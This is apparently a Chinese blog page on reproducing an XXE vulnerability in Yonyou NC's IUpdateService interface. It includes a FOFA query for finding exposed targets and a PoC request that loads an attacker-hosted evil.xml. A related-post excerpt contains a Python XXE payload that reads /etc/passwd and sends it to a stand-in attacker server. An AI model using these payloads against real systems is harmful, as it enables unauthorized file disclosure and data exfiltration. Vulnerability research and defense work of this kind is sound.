用友 NC IUpdateService XXE漏洞复现

已于 2024-01-06 21:16:10 修改
阅读量2k 收藏 11
点赞数 10
CC 4.0 BY-SA版权
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2024-01-06 20:35:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135431509
本文介绍了用友NC软件IUpdateService接口存在的XXE漏洞,该漏洞可能导致敏感信息泄露和系统文件读取。复现环境涉及FOFA平台,修复建议包括限制接口访问权限和升级到安全版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

用友 NC 是用友网络科技股份有限公司开发的一款大型企业数字化平台。

0x02 漏洞概述

用友 NC IUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统处于极不安全状态。

0x03 复现环境

FOFA:

app="用友-UFIDA-NC"

0x04 漏洞概述

PoC

GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/evil.xml HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
了解本专栏 订阅专栏 解锁全文 超级会员免费看
用友U8 Cloud NCPortalServlet 存在XXE漏洞(CNVD-2025-06352)
m0_50125527的博客
05-15 710
用友U8 CloudNCPortalServlet接口存在XML外部实体注入(XXE漏洞,攻击者可通过提交恶意XML请求读取服务器敏感文件(如配置文件、数据库凭证等),甚至可能进一步导致远程代码执行(RCE)。该漏洞因系统未对用户输入的XML数据进行有效过滤和实体禁用而产生,属于高危安全风险,建议用户尽快应用官方补丁或通过禁用外部实体解析进行临时防护。对于因不当使用本文信息而造成的任何直接或间接后果,作者概不负责。若您发现本文内容涉及侵权或不当信息,请及时联系我们,我们将立即核实并采取必要措施。
用友NC Cloud IUpdateService接口存在XXE漏洞
nnn2188185的博客
01-12 527
用友NC Cloud IUpdateService接口存在XXE漏洞
【HW必备】用友NC-Cloud存在17处漏洞合集
小司机的奥拓
06-24 1612
高质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。如果师傅还是新手,内部的交流群有很多行业老师傅可以为你解答学习上的疑惑,内部分享的POC可以助你在Edu和补天等平台获得一定的排名。如果师傅已经是老手了,有一个高质量的LD库也能为你的工作提高极大的效率,实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。Cmd5解密,各种漏洞利用工具及后续更新,渗透工具、文档资源分享。
用友SQL注入/XXE/NC控制台绕过漏洞危害描述以及修复建议(只是文字)
为了低调的博客
08-18 647
用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞。yongyou-U8-Cloud-smartweb2-xxe 用友NC控制台密码绕过漏洞存在
漏洞复现--用友NC Cloud XXE
qq_53003652的博客
12-27 1930
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品soapFormat和IUpdateService存在XXE漏洞,可导致文件读取和RCE。
漏洞复现用友NC-Cloud soapFormat XXE漏洞
m0_71285176的博客
01-12 953
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。
漏洞情报-x友NC-Cloud soapFor mat XXE漏洞
qq_52612931的博客
01-11 975
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。用友NC Cloud
漏洞情报 | 用友NC存在远程命令执行漏洞
爱国小白帽
06-05 1857
0x01 漏洞描述 NC产品是面向集团企业的世界级高端管理软件,市场占有率在同类产品中已经达到亚太第一,已在8000家集团企业中应用,国内用户涵盖大多数关键基础设施运营单位。用友NC综合利用最新的互联网技术、云计算技术、移动应用技术等,通过构建大企业私有云来全面满足集团企业管理、全产业链管控和电子商务运营,成为大型集团企业生产运营中必备的一环,其安全性至关重要,一旦攻击者成功攻破该系统,不仅可以获取企业集团财务人员相关信息和运行数据,极易造成公司重要信息泄露,给公司带来极其不良的社会影响和经济损失;而且还可
漏洞复现用友U8 Cloud XChangeServlet XXE漏洞复现
m0_71944965的博客
12-30 287
用友U8 cloud /servicelXChangeServlet接口存在XXE漏洞,未授权的攻击者可通过此漏洞获取数据库敏感信息,从而盗取服务器数据造成服务器信息泄露。
用友U8 Cloud XChangeServlet XXE漏洞复现
0xSec
04-30 884
用友U8 Cloud XChangeServlet接口存在XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
用友U8 Cloud soapFormat XXE漏洞复现
0xSec
12-27 1032
用友U8 Cloud soapFormat.ajax接口存在 XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
XXE漏洞(2)漏洞实战
jelly
07-07 2389
本次测试XXE主要在靶机上安装了bWAPP程序,中间有一关为XXE漏洞很好做测试了解XXE漏洞。 靶机:192.168.56.101 攻击机kali:192.168.56.1 目录 了解XXE漏洞原理 漏洞成因 怎么判断网站是否存在XXE漏洞 基本利用 XML漏洞利用 任意文件读取 有回显的xxe利用 读取特殊符号文件 没有回显读取文档的方式 内网探测 DDOS攻击 XXE漏洞防御 了解XXE漏洞原理 漏洞成因 XXE漏洞全称XML External Entity ...
XXE漏洞】buu_[NCTF2019]Fake XML cookbook
serendipity1130的博客
09-11 360
[NCTF2019]Fake XML cookbook XXE漏洞 学习文章:XXE漏洞学习和利用—[NCTF2019]Fake XML cookbook-布布扣-bubuko.com XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 1.抓包发现里面存在一个X
用友 ufida-nc 文件读取漏洞
qq_36334672的博客
02-05 1199
用友移动系统管理portal接口存在任意文件读取,攻击者可在无需登录的情况下进行任意文件读取。
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1151
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞,附带自己写的poc脚本
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 878
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
热门推荐
0xSec
06-29 1万+
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
Karka_的博客
03-16 1088
补丁名称问题描述发布时间产品版本领域模块nc65_sysFunctionManager下标越界和空指针合集补丁NC6.5集团采供库存管理nc633_ldap公共入口漏洞补丁nc633_ldap公共入口漏洞补丁NC6.33UAP基础技术框架nc65_ldap公共入口漏洞补丁nc65_ldap公共入口漏洞补丁NC6.5UAP基础技术框架ncc1909ldap公共入口漏洞补丁ncc1909ldap公共入口漏洞补丁应用平台基础技术框架。
漏洞复现用友NC Cloud uploadChunk任意文件上传漏洞
失心少年
11-22 527
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。漏洞链接:http://127.0.0.1/ncchr/pm/fb/attachment/uploadChunk?
致远getAjaxDataServlet_xxe漏洞复现
最新发布
03-08
### 致远 getAjaxDataServlet XXE 漏洞复现方法 #### 准备工作 为了成功复现致远 `getAjaxDataServlet` 的XXE漏洞,需准备如下环境和工具: - **测试环境**:搭建一个易受攻击的致远OA系统版本。由于该漏洞存在于特定版本中[^3],建议使用已知受影响的版本进行实验。 - **网络监听工具**:如Wireshark或Burp Suite用于捕获并分析HTTP流量。 #### 构造恶意XML数据包 构建能够触发XXE漏洞的有效载荷是关键所在。通常情况下,可以通过发送特制的POST请求给`getAjaxDataServlet`接口来尝试读取本地文件或其他敏感资源。下面是一个简单的Python脚本示例,展示了如何构造这样的请求: ```python import requests url = 'http://target.com/getAjaxDataServlet' payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "file:///etc/passwd"> <!ENTITY % init "<!ENTITY % send SYSTEM 'http://attacker-server/?%remote;'>"> ]> <root>&send;</root>''' headers = { 'Content-Type': 'text/xml', } response = requests.post(url, headers=headers, data=payload) print(response.text) ``` 这段代码会向目标服务器提交一个包含外部实体定义(`&remote`)以及内部参数化实体(`&init`)引用的XML文档作为输入。当服务端处理这个请求时,如果存在未修复的安全缺陷,则可能会将/etc/passwd的内容泄露出来并通过URL查询字符串的形式传递给指定的远程地址(attacker-server)[^4]。 请注意,在实际操作过程中应当遵循合法合规的原则,并确保获得授权后再对任何在线系统实施此类测试活动。 #### 验证结果 一旦上述过程完成之后,可以在自己的控制范围内检查是否有来自受害主机的数据被传输到了预先设定好的接收点上;也可以直接观察响应体内的异常返回值以确认是否存在潜在风险。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值